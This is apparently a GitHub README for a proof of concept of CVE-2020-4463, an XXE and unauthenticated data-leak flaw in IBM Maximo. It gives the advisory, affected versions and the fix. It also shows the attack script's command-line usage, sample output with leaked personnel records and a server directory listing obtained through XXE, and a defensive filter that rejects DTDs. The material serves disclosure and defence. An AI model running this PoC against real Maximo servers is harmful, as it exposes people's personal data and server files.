Ibonok / CVE-2020-4463

Licence: other
IBM Maximo Asset Management is vulnerable to Information Disclosure via XXE Vulnerability (CVE-2020-4463)

IBM Maximo Asset Management is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.

Base Score: 8.2

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L

Affected Core Components

IBM Maximo Asset Management 7.6.0
IBM Maximo Asset Management 7.6.1
IBM Maximo Asset Management, all versions before 7.6.0

Affected Products

Maximo for Aviation
Maximo for Life Sciences
Maximo for Nuclear Power
Maximo for Oil and Gas
Maximo for Transportation
Maximo for Utilities
SmartCloud Control Desk
IBM Control Desk
Tivoli Integration Composer

Patched in Version

Fixed Version: Maximo Asset Management 7.6.1.2
Prior versions: see workaround (link below)

Links:

PoC

Here is the PoC for the vulnerability. The versions mentioned by IBM are not the only vulnerable ones; all versions before 7.6.0 may also be vulnerable.

The PoC checks for two vulnerabilities that might be present on the system: a data leakage vulnerability that can be exploited if no authentication is implemented, and the XXE vulnerability that can be exploited if a certain value (mxe.int.resolvexmlextentity=0) is not set in the configuration.
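
Added example (not part of the original PoC or of Maximo): a defensive pre-parse gate that could sit in front of an XML integration endpoint as a second layer next to the mxe.int.resolvexmlextentity=0 setting. It inspects a request body with expat, which resolves nothing here, and rejects any document carrying a DTD or entity declaration. The function names and the sample documents are constructed for illustration.

```python
import xml.parsers.expat

def inspect_xml(body: bytes) -> dict:
    """Parse without resolving entities and record every DTD feature seen."""
    found = {"doctype": False, "external": [], "internal": [], "well_formed": True}
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        found["doctype"] = True
        if system_id:  # <!DOCTYPE q SYSTEM "..."> pulls in an external DTD
            found["external"].append(("<external DTD>", system_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        label = ("%" if is_param else "") + name
        if system_id is not None:   # declared with SYSTEM or PUBLIC
            found["external"].append((label, system_id))
        else:                       # internal entity, relevant for expansion abuse
            found["internal"].append(label)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    # No ExternalEntityRefHandler is installed, so references are skipped, not fetched.
    try:
        parser.Parse(body, True)
    except xml.parsers.expat.ExpatError:
        found["well_formed"] = False
    return found

def verdict(body: bytes) -> str:
    """Decision a gateway or filter would log before handing the body on."""
    f = inspect_xml(body)
    if f["external"]:
        return "reject: external entity"
    if f["doctype"]:
        return "reject: DTD present"
    if not f["well_formed"]:
        return "reject: malformed"
    return "accept"

# Constructed sample bodies (not captured traffic).
BENIGN = b'<?xml version="1.0" encoding="UTF-8"?><Query xmlns="http://www.ibm.com/maximo"/>'
EXTERNAL = (b'<?xml version="1.0"?><!DOCTYPE q [<!ENTITY e SYSTEM '
            b'"file:///constructed/placeholder">]><q>&e;</q>')
INTERNAL = b'<?xml version="1.0"?><!DOCTYPE q [<!ENTITY a "x">]><q>&a;</q>'

if __name__ == "__main__":
    for sample in (BENIGN, EXTERNAL, INTERNAL, b"<a><b></a>"):
        print(verdict(sample))
```

Rejecting every DTD, not only external entities, also covers the memory-consumption impact named in the advisory text, since entity expansion requires a DTD.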

Example

Usage

python3 CVE-2020-4463.py --help
usage: CVE-2020-4463.py [-h] [-x [XXE]] [-d [DATALEAK]] [--url [URL]]

CVE-2020-4463 PoC Data Leakage and XXE

optional arguments:
  -h, --help            show this help message and exit
  -x [XXE], --xxe [XXE]
                        XXE (Linux/Windows)
  -d [DATALEAK], --dataleak [DATALEAK]
                        Data Leakage REST request MXPERSON. May take a long
                        time.
  --url [URL]           Target URL http://, https://

If you get the following response, neither vulnerability is present.

Error 500: BMXAA1268E - No user credentials.

Data Leakage

May take a long time if the database contains many entries.

CVE-2020-4463 git:(master) ✗ python3 CVE-2020-4463.py --url https://10.0.0.1 -d

<?xml version="1.0" encoding="UTF-8"?>
<QueryMXPERSONResponse xmlns="http://www.ibm.com/maximo" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    creationDateTime="2020-11-16T10:42:49+01:0 0" transLanguage="EN" baseLanguage="EN"
    messageID="6927296.160551977018422092" maximoVersion="7 6 20170418-0100 V7608-61" rsStart="0" rsTotal="4374"
    rsCount="4374">
    <MXPERSONSet>
        <PERSON>
            <ADDRESSLINE1></ADDRESSLINE1>
            <CITY></CITY>
            <CLASSSTRUCTUREID></CLASSSTRUCTUREID>
            <COUNTRY></COUNTRY>
            <C_DESCRIZIONE></C_DESCRIZIONE>
            <C_MATRICOLA></C_MATRICOLA>
            <C_QUALIFICA></C_QUALIFICA>
            <FIRSTNAME>Lxxxxxxx</FIRSTNAME>
            <LANGUAGE>IT</LANGUAGE>
            <LASTNAME>xxxxxx</LASTNAME>
            <PERSONID>Lxxxxxxx</PERSONID>
            <POSTALCODE></POSTALCODE>
            <PRIMARYEMAIL>[email protected]</PRIMARYEMAIL>
            <PRIMARYPHONE></PRIMARYPHONE>
            <STATEPROVINCE></STATEPROVINCE>
            <STATUS maxvalue="ACTIVE">ACTIVE</STATUS>
            <TITLE></TITLE>
            <USERNOTFTYPE></USERNOTFTYPE>
            <EMAIL>
                <EMAILADDRESS>[email protected]</EMAILADDRESS>
            </EMAIL>
        </PERSON>

XXE

CVE-2020-4463 git:(master) ✗ python3 CVE-2020-4463.py --url https://10.0.0.1 -x          

Error 500: BMXAA4160E - A major exception has occurred. Check the system log to see if there are any companion errors logged. Report this error to your system administrator.
	/c: &#40;No such file or directory&#41;
Error 500: For input string: &quot;bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost&#43;found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
&quot;